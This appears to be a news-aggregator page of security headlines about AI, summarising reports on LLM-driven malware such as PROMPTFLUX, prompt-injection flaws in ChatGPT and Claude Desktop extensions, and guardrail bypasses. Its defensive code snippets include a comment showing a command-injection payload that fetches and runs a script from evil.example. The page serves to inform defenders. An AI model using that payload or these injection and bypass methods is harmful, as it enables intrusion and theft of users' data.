All news tagged #ai security

Thu, November 6, 2025

Digital Health Needs Security at Its Core to Scale AI

🔒 The article argues that AI-driven digital health initiatives proved essential during COVID-19 but simultaneously exposed critical cybersecurity gaps that threaten pandemic preparedness. It warns that expansive data ecosystems, IoT devices and cloud pipelines multiply attack surfaces and that subtle AI-specific threats — including data poisoning, model inversion and adversarial inputs — can undermine public-health decisions. The author urges security by design, including zero-trust architectures, data provenance, encryption, model governance and cross-disciplinary drills so AI can deliver trustworthy, resilient public health systems.

read more →

Thu, November 6, 2025

Google: Cyber-Physical Attacks to Rise in Europe 2026

🚨 Google Cloud Security's Cybersecurity Forecast 2026 warns of a rise in cyber-physical attacks across EMEA targeting energy grids, transport and digital infrastructure. The report highlights increased state-sponsored espionage from Russia and China and anticipates these operations may form hybrid warfare combined with information operations to erode public trust. It also flags supply-chain compromises of managed service providers and software dependencies, and notes that cybercrime — including ransomware aimed at ERP systems — will remain a major disruptive threat to ICS/OT. Analysts further expect adversaries to increasingly leverage AI and multimodal deepfakes.

read more →

Thu, November 6, 2025

Google: LLMs Employed Operationally in Malware Attacks

🤖 Google’s Threat Intelligence Group (GTIG) reports attackers are using “just‑in‑time” AI—LLMs queried during execution—to generate and obfuscate malicious code. Researchers identified two families, PROMPTSTEAL and PROMPTFLUX, which query Hugging Face and Gemini APIs to craft commands, rewrite source code, and evade detection. GTIG also documents social‑engineering prompts that trick models into revealing red‑teaming or exploit details, and warns the underground market for AI‑enabled crime is maturing. Google says it has disabled related accounts and applied protections.

read more →

Thu, November 6, 2025

Forrester's 2026 Predictions: CIOs and CISOs on Alert

🔍 Forrester warns that 2026 will demand precision, resilience and strategic foresight from CIOs and CISOs as volatility persists and the AI hype phase gives way to a results-driven era. Leaders will face rising pressure to deliver measurable, secure outcomes from AI initiatives while managing vendor promises, postponements and tighter financial scrutiny. Neocloud growth, talent bottlenecks and accelerating quantum risk will further complicate planning and force cross-functional governance.

read more →

Wed, November 5, 2025

Vertex AI Agent Builder: Build, Scale, Govern Agents

🚀 Vertex AI Agent Builder is Google Cloud's integrated platform to build, scale, and govern production AI agents. The update expands the Agent Development Kit (ADK) and Agent Engine with configurable context layers to reduce token usage, an adaptable plugins framework, and new language SDK support including Go. Production features include observability, evaluation tools, simplified deployment via the ADK CLI, and strengthened governance with native agent identities and Model Armor protections.

read more →

Wed, November 5, 2025

Google: PROMPTFLUX malware uses Gemini to self-write

🤖 Google researchers disclosed a VBScript threat named PROMPTFLUX that queries Gemini via a hard-coded API key to request obfuscated VBScript designed to evade static detection. A 'Thinking Robot' component logs AI responses to %TEMP% and writes updated scripts to the Windows Startup folder to maintain persistence. Samples include propagation attempts to removable drives and mapped network shares, and variants that rewrite their source on an hourly cadence. Google assesses the malware as experimental and currently lacking known exploit capabilities.

read more →

Wed, November 5, 2025

Google: New AI-Powered Malware Families Deployed

⚠️ Google's Threat Intelligence Group reports a surge in malware that integrates large language models to enable dynamic, mid-execution changes—what Google calls "just-in-time" self-modification. Notable examples include the experimental PromptFlux VBScript dropper and the PromptSteal data miner, plus operational threats like FruitShell and QuietVault. Google disabled abused Gemini accounts, removed assets, and is hardening model safeguards while collaborating with law enforcement.

read more →

Wed, November 5, 2025

GTIG Report: AI-Enabled Threats Transform Cybersecurity

🔒 The Google Threat Intelligence Group (GTIG) released a report documenting a clear shift: adversaries are moving beyond benign productivity uses of AI and are experimenting with AI-enabled operations. GTIG observed state-sponsored actors from North Korea, Iran and the People's Republic of China using AI for reconnaissance, tailored phishing lure creation and data exfiltration. Threats described include AI-powered, self-modifying malware, prompt-engineering to bypass safety guardrails, and underground markets selling advanced AI attack capabilities. Google says it has disrupted malicious assets and applied that intelligence to strengthen classifiers and its AI models.

read more →

Wed, November 5, 2025

GTIG report: Adversaries adopt AI for advanced attacks

⚠️ The Google Threat Intelligence Group (GTIG) reports that adversaries are evolving beyond simple productivity uses of AI toward operational misuse. Observed behaviors include state-sponsored actors from North Korea, Iran and the People's Republic of China using AI for reconnaissance, automated phishing lure creation and data exfiltration. The report documents AI-powered malware that can generate and modify malicious scripts in real time and attackers exploiting deceptive prompts to bypass model guardrails. Google says it has disabled assets linked to abuse and applied intelligence to improve classifiers and harden models against misuse.

read more →

Wed, November 5, 2025

Lack of AI Training Becoming a Major Security Risk

⚠️ A majority of German employees already use AI at work, with 62% reporting daily use of generative tools such as ChatGPT. Adoption has been largely grassroots—31% began using AI independently and nearly half learned via videos or informal study. Although 85% deem training on AI and data protection essential, 25% report no security training and 47% received only informal guidance, leaving clear operational and data risks.

read more →

Wed, November 5, 2025

Researchers Find ChatGPT Vulnerabilities in GPT-4o/5

🛡️ Cybersecurity researchers disclosed seven vulnerabilities in OpenAI's GPT-4o and GPT-5 models that enable indirect prompt injection attacks to exfiltrate user data from chat histories and stored memories. Tenable researchers Moshe Bernstein and Liv Matan describe zero-click search exploits, one-click query execution, conversation and memory poisoning, a markdown rendering bug, and a safety bypass using allow-listed Bing links. OpenAI has mitigated some issues, but experts warn that connecting LLMs to external tools broadens the attack surface and that robust safeguards and URL-sanitization remain essential.
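The URL-sanitization safeguard the researchers call for amounts to an allow-list filter on any link the model is about to render. A minimal sketch (the host list, function names, and markdown handling are illustrative assumptions, not OpenAI's implementation):

```python
import re
from urllib.parse import urlparse

# Hypothetical allow-list; a real deployment would derive this from policy.
ALLOWED_HOSTS = {"www.bing.com"}

def sanitize_url(url: str) -> bool:
    """Accept only http(s) URLs whose host is on the allow-list."""
    parsed = urlparse(url)
    return parsed.scheme in ("http", "https") and parsed.hostname in ALLOWED_HOSTS

def sanitize_markdown_links(text: str) -> str:
    """Strip markdown links with disallowed targets, keeping only the link text."""
    def repl(m: re.Match) -> str:
        label, url = m.group(1), m.group(2)
        return m.group(0) if sanitize_url(url) else label
    return re.sub(r"\[([^\]]*)\]\(([^)\s]+)\)", repl, text)
```

Filtering on the parsed hostname rather than a substring match matters here: the allow-listed-Bing-link bypass described above shows how attackers hunt for trusted domains that can smuggle arbitrary destinations.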

read more →

Wed, November 5, 2025

Addressing the AI Black Box with Prisma AIRS 2.0 Platform

🔒 Prisma AIRS 2.0 presents a unified AI security platform that addresses the “AI black box” by combining AI Model Security and automated AI Red Teaming. It inventories models, inference datasets, applications and agents in real time, inspects model artifacts within CI/CD and model registries, and conducts continuous, context-aware adversarial testing. The platform integrates curated threat intelligence and governance mappings to deliver auditable risk scores and prioritized remediation guidance for enterprise teams.

read more →

Wed, November 5, 2025

GTIG: Threat Actors Shift to AI-Enabled Runtime Malware

🔍 Google Threat Intelligence Group (GTIG) reports an operational shift from adversaries using AI for productivity to embedding generative models inside malware to generate or alter code at runtime. GTIG details “just-in-time” LLM calls in families like PROMPTFLUX and PROMPTSTEAL, which query external models such as Gemini to obfuscate, regenerate, or produce one‑time functions during execution. Google says it disabled abusive assets, strengthened classifiers and model protections, and recommends monitoring LLM API usage, protecting credentials, and treating runtime model calls as potential live command channels.
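GTIG's advice to treat runtime model calls as potential live command channels lends itself to a simple log-scan heuristic: flag processes contacting hosted-LLM endpoints that have no business doing so. A minimal sketch, assuming a simplified "process host" proxy-log format (the endpoint list is illustrative, not taken from the report):

```python
# Well-known hosted-LLM API hosts; extend per environment.
LLM_API_HOSTS = {
    "generativelanguage.googleapis.com",  # Gemini API
    "api-inference.huggingface.co",       # Hugging Face Inference API
    "api.openai.com",
}

def flag_llm_calls(log_lines, approved_processes=frozenset()):
    """Yield (process, host) pairs for LLM API calls from unapproved processes.

    Expects simple 'process host' lines, e.g.
    'wscript.exe generativelanguage.googleapis.com'.
    """
    for line in log_lines:
        parts = line.split()
        if len(parts) != 2:
            continue
        process, host = parts
        if host in LLM_API_HOSTS and process not in approved_processes:
            yield process, host
```

A scripting host such as `wscript.exe` reaching an LLM API is exactly the PROMPTFLUX-style signal GTIG describes, while a developer's approved tooling would pass through quietly.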

read more →

Wed, November 5, 2025

Cloud CISO: Threat Actors' Growing Use of AI Tools

⚠️ Google's Threat Intelligence team reports a shift from experimentation to operational use of AI by threat actors, including AI-enabled malware and prompt-based command generation. GTIG highlighted PROMPTSTEAL, linked to APT28 (FROZENLAKE), which queries a Hugging Face LLM to generate scripts for reconnaissance, document collection, and exfiltration, while adopting greater obfuscation and altered C2 methods. Google disabled related assets, strengthened model classifiers and safeguards with DeepMind, and urges defenders to update threat models, monitor anomalous scripting and C2, and incorporate threat intelligence into model- and classifier-level protections.

read more →

Wed, November 5, 2025

Scientists Need a Positive Vision for Artificial Intelligence

🔬 While many researchers view AI as exacerbating misinformation, authoritarian tools, labor exploitation, environmental costs, and concentrated corporate power, the essay argues that resignation is not an option. It highlights concrete, beneficial applications—language access, AI-assisted civic deliberation, climate dialogue, national-lab research models, and advances in biology—while acknowledging imperfections. Drawing on Rewiring Democracy, the authors call on scientists to reform industry norms, document abuses, responsibly deploy AI for public benefit, and retrofit institutions to manage disruption.

read more →

Wed, November 5, 2025

Securing the Open Android Ecosystem with Samsung Knox

🔒 Samsung Knox is a built-in security platform for Samsung Galaxy devices that combines hardware- and software-level protections to safeguard enterprise data and provide IT teams with centralized control. It layers defenses — including AI-powered malware detection, curated app controls, Message Guard for zero-click image scanning, and DEFEX exploit detection — while integrating with EMMs and offering granular update management via Knox E-FOTA. The platform emphasizes visibility, policy enforcement, and predictable lifecycle management to reduce risk and operational disruption.

read more →

Wed, November 5, 2025

Prompt Injection Flaw in Anthropic Claude Desktop Exts

🔒 Anthropic's official Claude Desktop extensions for Chrome, iMessage and Apple Notes were found vulnerable to web-based prompt injection that could enable remote code execution. Koi Security reported unsanitized command injection in the packaged Model Context Protocol (MCP) servers, which run unsandboxed on users' devices with full system permissions. Unlike browser extensions, these connectors can read files, execute commands and access credentials. Anthropic released a fix in v0.1.9, verified by Koi Security on September 19.
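The root cause Koi Security describes, unsanitized command injection, typically comes from splicing model-controlled text into a shell string. A minimal illustration of the vulnerable pattern and its fix (hypothetical helper names, not Anthropic's actual MCP code):

```python
import subprocess

def search_notes_unsafe(query: str):
    # Vulnerable pattern: model-controlled text is interpolated into a shell
    # string, so a prompt-injected query like '"; curl evil.example | sh'
    # escapes the quotes and runs arbitrary commands.
    return subprocess.run(f'grep -r "{query}" Notes/', shell=True)

def search_notes_safe(query: str, notes_dir: str = "Notes"):
    # Safer pattern: pass arguments as a list so no shell ever parses the
    # query, and use '--' so a query starting with '-' cannot be read as a
    # grep option.
    return subprocess.run(["grep", "-r", "--", query, notes_dir],
                          capture_output=True, text=True)
```

With the list form, an injected payload is just an unmatched search pattern; it never reaches a shell, which is the standard mitigation for this class of flaw regardless of the MCP transport involved.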

read more →

Wed, November 5, 2025

Microsoft Expands Sovereign Cloud Capabilities, EU Focus

🛡️ Microsoft announced expanded sovereign cloud offerings aimed at helping governments and enterprises meet regulatory and resilience requirements across Europe and beyond. The update includes end-to-end AI data processing within an EU Data Boundary, expanded Microsoft 365 Copilot in-country processing to 15 countries and additional rollouts through 2026, plus a refreshed Sovereign Landing Zone for simplified deployment of sovereign controls. Azure Local gains increased scale, external SAN support, and NVIDIA RTX Pro 6000 Blackwell GPUs for high-performance on-prem AI, along with planned disconnected operations. A new Digital Sovereignty specialization gives partners a way to validate and badge their sovereign-cloud expertise.

read more →

Wed, November 5, 2025

10 Promising Cybersecurity Startups CISOs Should Know

🔒 This roundup profiles ten cybersecurity startups founded in 2020 or later that CISOs should watch, chosen for funding, leadership, customer traction, and strategic clarity. It highlights diverse categories including non-human identity, software supply chain, data security posture, and AI agent security. Notable vendors such as Astrix, Chainguard, Cyera, and Drata have raised substantial capital and achieved rapid enterprise adoption. The list underscores investor enthusiasm and the rise of runtime‑focused and agentic defenses.

read more →

Wed, November 5, 2025

CrowdStrike Expands Agentic Security Workforce With Agents

🤖 CrowdStrike announced new specialized agents and an orchestration layer designed to accelerate SOC operations and automation. The launch includes a Data Onboarding Agent, a Foundry App Creation Agent, and an updated Exposure Prioritization Agent to simplify pipeline creation, app development, and continuous authenticated scanning. Integrated with Charlotte Agentic SOAR and Charlotte AI, these agents enable coordinated, machine-speed workflows while keeping analysts in control.

read more →